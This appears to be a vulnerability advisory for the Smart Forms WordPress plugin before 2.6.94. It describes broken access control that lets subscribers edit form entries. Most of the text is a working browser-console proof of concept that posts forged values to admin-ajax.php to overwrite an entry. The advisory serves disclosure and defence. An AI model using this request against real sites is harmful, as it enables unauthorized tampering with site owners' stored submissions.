Smart Forms < 2.6.94 - Subscriber+ Edit Entries via Broken Access Control

Description The plugin does not have proper authorization in some actions, which could allow users with a role as low as a subscriber to call them and perform unauthorized actions

PoC

While logged as a subscriber, paste the following in your browser’s console: fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: new URLSearchParams({ ‘action’: ‘rednao_smart_forms_edit_form_values’, ‘entryId’: ‘7’, ‘entryString’: ‘{“rnField1”:{“value”:“Mr Hacker”},“rnField2”:{“value":"[email protected]”},“rnField3”:{“value”:“SUCCESSFUL FIELD HACK”}}’, ‘elementOptions’: JSON.stringify([{“_id”:35,“ClassName”:“rednaotextinput”,“IsRequired”:“n”,“Formulas”:{},“Styles”:{},“ContainerOptions”:{“Width”:-1,“Id”:“35”,“Type”:“single”},“Id”:“rnField1”,“Spacing”:“col-sm-12”,“Label”:“Name”,“Placeholder”:“”,“Value”:“”,“ReadOnly”:“n”,“Width”:“”,“Icon”:{“ClassName”:“”},“CustomCSS”:“”,“Placeholder_Icon”:{“ClassName”:“”,“Orientation”:“”},“_Selected”:true},{“_id”:36,“ClassName”:“rednaoemail”,“IsRequired”:“n”,“Formulas”:{},“Styles”:{},“ContainerOptions”:{“Width”:-1,“Id”:“37”,“Type”:“single”},“Id”:“rnField2”,“Spacing”:“col-sm-12”,“Label”:“Email”,“Placeholder”:“”,“Icon”:{“ClassName”:“”},“CustomCSS”:“”,“Placeholder_Icon”:{“ClassName”:“”,“Orientation”:“”},“Value”:“”,“ReadOnly”:“n”,“_Selected”:true},{“_id”:37,“ClassName”:“rednaotextarea”,“IsRequired”:“n”,“Formulas”:{},“Styles”:{},“ContainerOptions”:{“Width”:-1,“Id”:“39”,“Type”:“single”},“Id”:“rnField3”,“Spacing”:“col-sm-12”,“Label”:“Message”,“DefaultText”:“”,“Value”:“”,“Width”:“”,“Height”:“”,“Placeholder”:“”,“Disabled”:“n”,“MaxLength”:“”,“CustomCSS”:“”,“Placeholder_Icon”:{“ClassName”:“”,“Orientation”:“”},“_Selected”:true},{“_id”:38,“ClassName”:“rednaosubmissionbutton”,“IsRequired”:“n”,“Formulas”:{},“Styles”:{},“ContainerOptions”:{“Width”:-1,“Id”:“41”,“Type”:“single”},“Id”:“rnField4”,“Spacing”:“col-sm-12”,“ButtonText”:“Send”,“CustomCSS”:“”,“Icon”:{“ClassName”:“glyphicon glyphicon-send”,“Orientation”:“Add”},“Animated”:“y”,“Action”:“submit”,“_Selected”:true}]) }) }) .then(response => response.json()) .then(data => console.log(data)) .catch(error => console.error(‘Error:’, error));